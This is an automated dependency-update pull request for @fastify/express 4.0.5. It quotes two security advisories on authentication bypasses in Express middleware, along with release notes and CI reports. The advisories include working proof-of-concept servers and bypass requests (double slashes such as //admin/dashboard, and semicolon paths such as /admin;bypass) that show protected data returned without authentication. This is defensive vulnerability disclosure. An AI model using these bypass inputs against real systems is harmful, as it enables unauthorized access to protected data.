fix(deps): update dependency @fastify/express to v4.0.5 [security] - autoclosed

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@fastify/express	4.0.4 → 4.0.5

GitHub Vulnerability Alerts

CVE-2026-33807

Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem:

1. Parent scope registers middleware: app.use('/admin', authFn) — use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares
2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance)
3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child
4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path
5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin
6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC

const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@​fastify/express'));
  
  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });
  
  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
  
  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });
  
  await app.listen({ port: 19876, host: '0.0.0.0' });
  
  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}
  
  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}
  
  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

• No special request crafting is required — normal requests bypass the middleware
• It affects the idiomatic Fastify plugin pattern commonly used in production
• The bypass is silent with no errors or warnings
• Developers' basic testing of root-scoped routes will pass, masking the vulnerability
• Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions

• @fastify/express v4.0.4 (latest at time of discovery)
• Fastify 5.x in default configuration
• No special router options required (ignoreDuplicateSlashes not needed)
• Affects any child plugin registration where the prefix overlaps with middleware path scoping
• Does NOT affect middleware registered without path scoping (global middleware)
• Does NOT affect middleware registered on root path (/) due to special case handling

Variant Testing

Scenario	Middleware Path	Child Prefix	Result
Root route /admin/root-data	/admin	N/A	Middleware runs (403)
Child route /admin/secret	/admin	/admin	BYPASS (200)
Child route /api/data	/api	/api	BYPASS (200)
Nested child /admin/sub/data	/admin	/admin/sub	BYPASS — path becomes /admin/sub/admin
Middleware on / with any child	/	/api	No bypass — path === '/' && prefix.length > 0 special case

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:

1. Store the original path and function separately in kMiddlewares before prefixing
2. Strip the parent prefix before re-registering in child scopes
3. Store already-constructed Express middleware objects rather than re-processing paths

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE-2026-33808

Summary

@fastify/express v4.0.4 fails to normalize URLs before passing them to Express middleware when Fastify router normalization options are enabled. This allows complete bypass of path-scoped authentication middleware via two vectors:

1. Duplicate slashes (//admin/dashboard) when ignoreDuplicateSlashes: true is configured
2. Semicolon delimiters (/admin;bypass) when useSemicolonDelimiter: true is configured

In both cases, Fastify's router normalizes the URL and matches the route, but @fastify/express passes the original un-normalized URL to Express middleware, which fails to match and is skipped.

Note: This is distinct from GHSA-g6q3-96cp-5r5m (CVE-2026-22037), which addressed URL percent-encoding bypass and was patched in v4.0.3. These normalization gaps remain in v4.0.4. A similar class of normalization issue was addressed in @fastify/middie via GHSA-8p85-9qpw-fwgw (CVE-2026-2880), but @fastify/express does not include the equivalent fixes.

Details

The vulnerability exists in @fastify/express's enhanceRequest function (index.js lines 43-46):

const decodedUrl = decodeURI(url)
req.raw.url = decodedUrl

The decodeURI() function only handles percent-encoding — it does not normalize duplicate slashes or strip semicolon-delimited parameters. When Fastify's router options are enabled, find-my-way applies these normalizations during route matching, but @fastify/express passes the original URL to Express middleware.

Vector 1: Duplicate Slashes

When ignoreDuplicateSlashes: true is set, Fastify's find-my-way router normalizes //admin/dashboard to /admin/dashboard for route matching. However, Express middleware receives //admin/dashboard. Express's app.use('/admin', authMiddleware) expects paths to start with /admin/, but //admin does not match the /admin prefix pattern.

The attack sequence:

1. Client sends GET //admin/dashboard
2. Fastify's router normalizes this to /admin/dashboard and finds a matching route
3. enhanceRequest sets req.raw.url = "//admin/dashboard" (preserves double slash)
4. Express middleware app.use('/admin', authMiddleware) does not match //admin prefix
5. Authentication is bypassed, and the Fastify route handler executes

Vector 2: Semicolon Delimiters

When useSemicolonDelimiter: true is configured, the router uses find-my-way's safeDecodeURI() which treats semicolons as query string delimiters, splitting /admin;bypass into path /admin and querystring bypass for route matching. However, @fastify/express passes the full URL /admin;bypass to Express middleware.

Express uses path-to-regexp v0.1.12 internally, which compiles middleware paths like /admin to the regex /^\/admin\/?(?=\/|$)/i. A semicolon character does not satisfy the lookahead condition, causing the middleware match to fail.

The attack flow:

1. Request GET /admin;bypass arrives
2. Fastify router: splits at ; — matches route GET /admin
3. Express middleware: regex /^\/admin\/?(?=\/|$)/i fails against /admin;bypass — middleware skipped
4. Route handler executes without authentication checks

PoC

Duplicate Slash Bypass

Save as server.js and run with node server.js:

const fastify = require('fastify')

async function start() {
  const app = fastify({
    logger: false,
    ignoreDuplicateSlashes: true,  // documented Fastify option
  })

  await app.register(require('@​fastify/express'))

  // Standard Express middleware auth pattern
  app.use('/admin', function expressAuthGate(req, res, next) {
    const auth = req.headers.authorization
    if (!auth || auth !== 'Bearer admin-secret-token') {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden by Express middleware' }))
      return
    }
    next()
  })

  // Protected route
  app.get('/admin/dashboard', async (request) => {
    return { message: 'Admin dashboard', secret: 'sensitive-admin-data' }
  })

  await app.listen({ port: 3000 })
  console.log('Listening on http://localhost:3000')
}
start()

# Normal access — blocked by Express middleware
$ curl -s http://localhost:3000/admin/dashboard
{"error":"Forbidden by Express middleware"}

# Double-slash bypass — Express middleware skipped, handler runs
$ curl -s http://localhost:3000//admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

# Triple-slash also works
$ curl -s http://localhost:3000///admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

Multiple variants work: ///admin, /.//admin, //admin//dashboard, etc.

Semicolon Bypass

const fastify = require('fastify')
const http = require('http')

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = ''
      res.on('data', (chunk) => data += chunk)
      res.on('end', () => resolve({ status: res.statusCode, body: data }))
    }).on('error', reject)
  })
}

async function test() {
  const app = fastify({ 
    logger: false, 
    routerOptions: { useSemicolonDelimiter: true }
  })
  await app.register(require('@​fastify/express'))
  
  // Auth middleware blocking unauthenticated access
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden' }))
      return
    }
    next()
  })
  
  app.get('/admin', async () => ({ secret: 'classified-info' }))
  
  await app.listen({ port: 19900, host: '0.0.0.0' })
  
  // Blocked:
  let r = await get(19900, '/admin')
  console.log('/admin:', r.status, r.body)
  // Output: /admin: 403 {"error":"Forbidden"}
  
  // BYPASS:
  r = await get(19900, '/admin;bypass')
  console.log('/admin;bypass:', r.status, r.body)
  // Output: /admin;bypass: 200 {"secret":"classified-info"}
  
  r = await get(19900, '/admin;')
  console.log('/admin;:', r.status, r.body)
  // Output: /admin;: 200 {"secret":"classified-info"}
  
  await app.close()
}
test()

Actual output:

/admin: 403 {"error":"Forbidden"}
/admin;bypass: 200 {"secret":"classified-info"}
/admin;: 200 {"secret":"classified-info"}

The semicolon bypass works with any text after it: /admin;, /admin;x, /admin;jsessionid=123.

Impact

Complete authentication bypass for applications using Express middleware for path-based access control. An unauthenticated attacker can access protected routes (admin panels, APIs, user data) by manipulating the URL path.

Duplicate slash vector affects applications that:

1. Use @fastify/express with ignoreDuplicateSlashes: true
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

Semicolon vector affects applications that:

1. Use @fastify/express with useSemicolonDelimiter: true (commonly enabled for Java application server compatibility, e.g., handling ;jsessionid= parameters)
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

The bypass works against all Express middleware that uses prefix path matching, including popular packages like express-basic-auth, custom authentication middleware, and rate limiting middleware.

The ignoreDuplicateSlashes and useSemicolonDelimiter options are documented as convenience features, not marked as security-sensitive, so developers would not expect them to impact middleware security.

Affected Versions

• @fastify/express v4.0.4 (latest) with Fastify 5.x
• Requires ignoreDuplicateSlashes: true or useSemicolonDelimiter: true in Fastify configuration (via top-level option or routerOptions)

Variant Testing

Duplicate slashes:

Request	Express Middleware	Handler Runs	Result
GET /admin/dashboard	Invoked (blocks)	No	403 Forbidden
GET //admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET ///admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET /.//admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET //admin//dashboard	Skipped	Yes	200 OK — BYPASS
GET /admin//dashboard	Invoked (blocks)	No	403 Forbidden

Semicolons:

URL	Express MW Fires	Route Matches	Result
/admin	Yes	Yes (200/403)	Normal
/admin;	No	Yes (200)	BYPASS
/admin;bypass	No	Yes (200)	BYPASS
/admin;x=1	No	Yes (200)	BYPASS
/admin;/dashboard	No	Yes (200, routes to /admin)	BYPASS
/admin/dashboard;x	Yes	Yes (routes to /admin/dashboard)	Normal (prefix /admin/ still matches)

The semicolon bypass is effective when the semicolon appears immediately after the middleware prefix boundary. For sub-paths where the prefix is already matched (e.g., /admin/dashboard;x), Express's prefix regex succeeds because the /admin/ part matches before the semicolon appears.

Suggested Fix

@fastify/express should normalize URLs before passing them to Express middleware, respecting the router normalization options that are enabled. Specifically:

• When ignoreDuplicateSlashes is enabled, apply FindMyWay.removeDuplicateSlashes() to req.raw.url before middleware execution
• When useSemicolonDelimiter is enabled, strip semicolon-delimited parameters from the URL before passing to Express

This would match the normalization behavior that @fastify/middie already implements via sanitizeUrlPath() and normalizePathForMatching().

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

---

@​fastify/express has a middleware authentication bypass via URL normalization gaps (duplicate slashes and semicolons)

CVE-2026-33808 / GHSA-6hw5-45gm-fj88

More information

Details

Summary

@fastify/express v4.0.4 fails to normalize URLs before passing them to Express middleware when Fastify router normalization options are enabled. This allows complete bypass of path-scoped authentication middleware via two vectors:

1. Duplicate slashes (//admin/dashboard) when ignoreDuplicateSlashes: true is configured
2. Semicolon delimiters (/admin;bypass) when useSemicolonDelimiter: true is configured

In both cases, Fastify's router normalizes the URL and matches the route, but @fastify/express passes the original un-normalized URL to Express middleware, which fails to match and is skipped.

Note: This is distinct from GHSA-g6q3-96cp-5r5m (CVE-2026-22037), which addressed URL percent-encoding bypass and was patched in v4.0.3. These normalization gaps remain in v4.0.4. A similar class of normalization issue was addressed in @fastify/middie via GHSA-8p85-9qpw-fwgw (CVE-2026-2880), but @fastify/express does not include the equivalent fixes.

Details

The vulnerability exists in @fastify/express's enhanceRequest function (index.js lines 43-46):

const decodedUrl = decodeURI(url)
req.raw.url = decodedUrl

The decodeURI() function only handles percent-encoding — it does not normalize duplicate slashes or strip semicolon-delimited parameters. When Fastify's router options are enabled, find-my-way applies these normalizations during route matching, but @fastify/express passes the original URL to Express middleware.

Vector 1: Duplicate Slashes

When ignoreDuplicateSlashes: true is set, Fastify's find-my-way router normalizes //admin/dashboard to /admin/dashboard for route matching. However, Express middleware receives //admin/dashboard. Express's app.use('/admin', authMiddleware) expects paths to start with /admin/, but //admin does not match the /admin prefix pattern.

The attack sequence:

1. Client sends GET //admin/dashboard
2. Fastify's router normalizes this to /admin/dashboard and finds a matching route
3. enhanceRequest sets req.raw.url = "//admin/dashboard" (preserves double slash)
4. Express middleware app.use('/admin', authMiddleware) does not match //admin prefix
5. Authentication is bypassed, and the Fastify route handler executes

Vector 2: Semicolon Delimiters

When useSemicolonDelimiter: true is configured, the router uses find-my-way's safeDecodeURI() which treats semicolons as query string delimiters, splitting /admin;bypass into path /admin and querystring bypass for route matching. However, @fastify/express passes the full URL /admin;bypass to Express middleware.

Express uses path-to-regexp v0.1.12 internally, which compiles middleware paths like /admin to the regex /^\/admin\/?(?=\/|$)/i. A semicolon character does not satisfy the lookahead condition, causing the middleware match to fail.

The attack flow:

1. Request GET /admin;bypass arrives
2. Fastify router: splits at ; — matches route GET /admin
3. Express middleware: regex /^\/admin\/?(?=\/|$)/i fails against /admin;bypass — middleware skipped
4. Route handler executes without authentication checks

PoC

Duplicate Slash Bypass

Save as server.js and run with node server.js:

const fastify = require('fastify')

async function start() {
  const app = fastify({
    logger: false,
    ignoreDuplicateSlashes: true,  // documented Fastify option
  })

  await app.register(require('@​fastify/express'))

  // Standard Express middleware auth pattern
  app.use('/admin', function expressAuthGate(req, res, next) {
    const auth = req.headers.authorization
    if (!auth || auth !== 'Bearer admin-secret-token') {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden by Express middleware' }))
      return
    }
    next()
  })

  // Protected route
  app.get('/admin/dashboard', async (request) => {
    return { message: 'Admin dashboard', secret: 'sensitive-admin-data' }
  })

  await app.listen({ port: 3000 })
  console.log('Listening on http://localhost:3000')
}
start()

##### Normal access — blocked by Express middleware
$ curl -s http://localhost:3000/admin/dashboard
{"error":"Forbidden by Express middleware"}

##### Double-slash bypass — Express middleware skipped, handler runs
$ curl -s http://localhost:3000//admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

##### Triple-slash also works
$ curl -s http://localhost:3000///admin/dashboard
{"message":"Admin dashboard","secret":"sensitive-admin-data"}

Multiple variants work: ///admin, /.//admin, //admin//dashboard, etc.

Semicolon Bypass

const fastify = require('fastify')
const http = require('http')

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = ''
      res.on('data', (chunk) => data += chunk)
      res.on('end', () => resolve({ status: res.statusCode, body: data }))
    }).on('error', reject)
  })
}

async function test() {
  const app = fastify({ 
    logger: false, 
    routerOptions: { useSemicolonDelimiter: true }
  })
  await app.register(require('@​fastify/express'))
  
  // Auth middleware blocking unauthenticated access
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403
      res.setHeader('content-type', 'application/json')
      res.end(JSON.stringify({ error: 'Forbidden' }))
      return
    }
    next()
  })
  
  app.get('/admin', async () => ({ secret: 'classified-info' }))
  
  await app.listen({ port: 19900, host: '0.0.0.0' })
  
  // Blocked:
  let r = await get(19900, '/admin')
  console.log('/admin:', r.status, r.body)
  // Output: /admin: 403 {"error":"Forbidden"}
  
  // BYPASS:
  r = await get(19900, '/admin;bypass')
  console.log('/admin;bypass:', r.status, r.body)
  // Output: /admin;bypass: 200 {"secret":"classified-info"}
  
  r = await get(19900, '/admin;')
  console.log('/admin;:', r.status, r.body)
  // Output: /admin;: 200 {"secret":"classified-info"}
  
  await app.close()
}
test()

Actual output:

/admin: 403 {"error":"Forbidden"}
/admin;bypass: 200 {"secret":"classified-info"}
/admin;: 200 {"secret":"classified-info"}

The semicolon bypass works with any text after it: /admin;, /admin;x, /admin;jsessionid=123.

Impact

Complete authentication bypass for applications using Express middleware for path-based access control. An unauthenticated attacker can access protected routes (admin panels, APIs, user data) by manipulating the URL path.

Duplicate slash vector affects applications that:

1. Use @fastify/express with ignoreDuplicateSlashes: true
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

Semicolon vector affects applications that:

1. Use @fastify/express with useSemicolonDelimiter: true (commonly enabled for Java application server compatibility, e.g., handling ;jsessionid= parameters)
2. Rely on Express middleware for authentication/authorization
3. Use path-scoped middleware patterns like app.use('/admin', authMiddleware)

The bypass works against all Express middleware that uses prefix path matching, including popular packages like express-basic-auth, custom authentication middleware, and rate limiting middleware.

The ignoreDuplicateSlashes and useSemicolonDelimiter options are documented as convenience features, not marked as security-sensitive, so developers would not expect them to impact middleware security.

Affected Versions

• @fastify/express v4.0.4 (latest) with Fastify 5.x
• Requires ignoreDuplicateSlashes: true or useSemicolonDelimiter: true in Fastify configuration (via top-level option or routerOptions)

Variant Testing

Duplicate slashes:

Request	Express Middleware	Handler Runs	Result
GET /admin/dashboard	Invoked (blocks)	No	403 Forbidden
GET //admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET ///admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET /.//admin/dashboard	Skipped	Yes	200 OK — BYPASS
GET //admin//dashboard	Skipped	Yes	200 OK — BYPASS
GET /admin//dashboard	Invoked (blocks)	No	403 Forbidden

Semicolons:

URL	Express MW Fires	Route Matches	Result
/admin	Yes	Yes (200/403)	Normal
/admin;	No	Yes (200)	BYPASS
/admin;bypass	No	Yes (200)	BYPASS
/admin;x=1	No	Yes (200)	BYPASS
/admin;/dashboard	No	Yes (200, routes to /admin)	BYPASS
/admin/dashboard;x	Yes	Yes (routes to /admin/dashboard)	Normal (prefix /admin/ still matches)

The semicolon bypass is effective when the semicolon appears immediately after the middleware prefix boundary. For sub-paths where the prefix is already matched (e.g., /admin/dashboard;x), Express's prefix regex succeeds because the /admin/ part matches before the semicolon appears.

Suggested Fix

@fastify/express should normalize URLs before passing them to Express middleware, respecting the router normalization options that are enabled. Specifically:

• When ignoreDuplicateSlashes is enabled, apply FindMyWay.removeDuplicateSlashes() to req.raw.url before middleware execution
• When useSemicolonDelimiter is enabled, strip semicolon-delimited parameters from the URL before passing to Express

This would match the normalization behavior that @fastify/middie already implements via sanitizeUrlPath() and normalizePathForMatching().

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-6hw5-45gm-fj88
• https://nvd.nist.gov/vuln/detail/CVE-2026-33808
• https://cna.openjsf.org/security-advisories.html
• https://github.com/fastify/fastify-express

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

@​fastify/express's middleware path doubling causes authentication bypass in child plugin scopes

CVE-2026-33807 / GHSA-hrwm-hgmj-7p9c

More information

Details

Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem:

1. Parent scope registers middleware: app.use('/admin', authFn) — use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares
2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance)
3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child
4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path
5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin
6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC

const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@​fastify/express'));
  
  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });
  
  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
  
  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });
  
  await app.listen({ port: 19876, host: '0.0.0.0' });
  
  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}
  
  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}
  
  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

• No special request crafting is required — normal requests bypass the middleware
• It affects the idiomatic Fastify plugin pattern commonly used in production
• The bypass is silent with no errors or warnings
• Developers' basic testing of root-scoped routes will pass, masking the vulnerability
• Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions

• @fastify/express v4.0.4 (latest at time of discovery)
• Fastify 5.x in default configuration
• No special router options required (ignoreDuplicateSlashes not needed)
• Affects any child plugin registration where the prefix overlaps with middleware path scoping
• Does NOT affect middleware registered without path scoping (global middleware)
• Does NOT affect middleware registered on root path (/) due to special case handling

Variant Testing

Scenario	Middleware Path	Child Prefix	Result
Root route /admin/root-data	/admin	N/A	Middleware runs (403)
Child route /admin/secret	/admin	/admin	BYPASS (200)
Child route /api/data	/api	/api	BYPASS (200)
Nested child /admin/sub/data	/admin	/admin/sub	BYPASS — path becomes /admin/sub/admin
Middleware on / with any child	/	/api	No bypass — path === '/' && prefix.length > 0 special case

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:

1. Store the original path and function separately in kMiddlewares before prefixing
2. Strip the parent prefix before re-registering in child scopes
3. Store already-constructed Express middleware objects rather than re-processing paths

Severity

• CVSS Score: 9.1 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References

• https://github.com/fastify/fastify-express/security/advisories/GHSA-hrwm-hgmj-7p9c
• https://nvd.nist.gov/vuln/detail/CVE-2026-33807
• https://cna.openjsf.org/security-advisories.html
• https://github.com/fastify/fastify-express

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

fastify/fastify-express (@​fastify/express)

v4.0.5

Compare Source

⚠️ Security Release

This fixes CVE CVE-2026-33807 GHSA-hrwm-hgmj-7p9c.
This fixes CVE CVE-2026-33808 GHSA-6hw5-45gm-fj88.

What's Changed

• build(deps): bump express from 4.22.1 to 5.2.1 by @​dependabot[bot] in #​179
• ci: remove stale.yml by @​Tony133 in #​181
• build(deps-dev): bump c8 from 10.1.3 to 11.0.0 by @​dependabot[bot] in #​183
• chore(license): standardise license notice by @​Fdawgs in #​182
• build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by @​dependabot[bot] in #​185
• build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by @​dependabot[bot] in #​187
• ci: add lock-threads workflow by @​Fdawgs in #​188

New Contributors

• @​Tony133 made their first contribution in #​181

Full Changelog: fastify/fastify-express@v4.0.4...v4.0.5

---

Configuration

📅 Schedule: (in timezone Asia/Tokyo)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 62.42%. Comparing base (a18c909) to head (d3d9710).
⚠️ Report is 35 commits behind head on develop.

Additional details and impacted files

@@             Coverage Diff             @@
##           develop   #17314      +/-   ##
===========================================
- Coverage    63.65%   62.42%   -1.23%     
===========================================
  Files         1161     1162       +1     
  Lines       116313   116557     +244     
  Branches      8407     9074     +667     
===========================================
- Hits         74042    72764    -1278     
- Misses       40063    41584    +1521     
- Partials      2208     2209       +1     

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[github-actions]

このPRによるapi.jsonの差分
差分はありません。
Get diff files from Workflow Page

[github-actions]

Backend memory usage comparison

Before GC

Metric	base (MB)	head (MB)	Diff (MB)	Diff (%)
VmRSS	301.37 MB	320.45 MB	+19.08 MB	+6.33%
VmHWM	301.37 MB	320.45 MB	+19.08 MB	+6.33%
VmSize	23099.42 MB	23100.76 MB	1.33 MB	0%
VmData	1363.18 MB	1364.48 MB	+1.29 MB	+0.09%

After GC

Metric	base (MB)	head (MB)	Diff (MB)	Diff (%)
VmRSS	301.47 MB	320.53 MB	+19.05 MB	+6.32%
VmHWM	301.47 MB	320.53 MB	+19.05 MB	+6.32%
VmSize	23099.42 MB	23100.84 MB	1.42 MB	0%
VmData	1363.18 MB	1364.56 MB	+1.37 MB	+0.10%

After Request

Metric	base (MB)	head (MB)	Diff (MB)	Diff (%)
VmRSS	301.68 MB	320.69 MB	+19.01 MB	+6.30%
VmHWM	301.69 MB	320.69 MB	+19.00 MB	+6.29%
VmSize	23099.51 MB	23100.84 MB	1.33 MB	0%
VmData	1363.19 MB	1364.56 MB	+1.37 MB	+0.10%

⚠️ Warning: Memory usage has increased by more than 5%. Please verify this is not an unintended change.

See workflow logs for details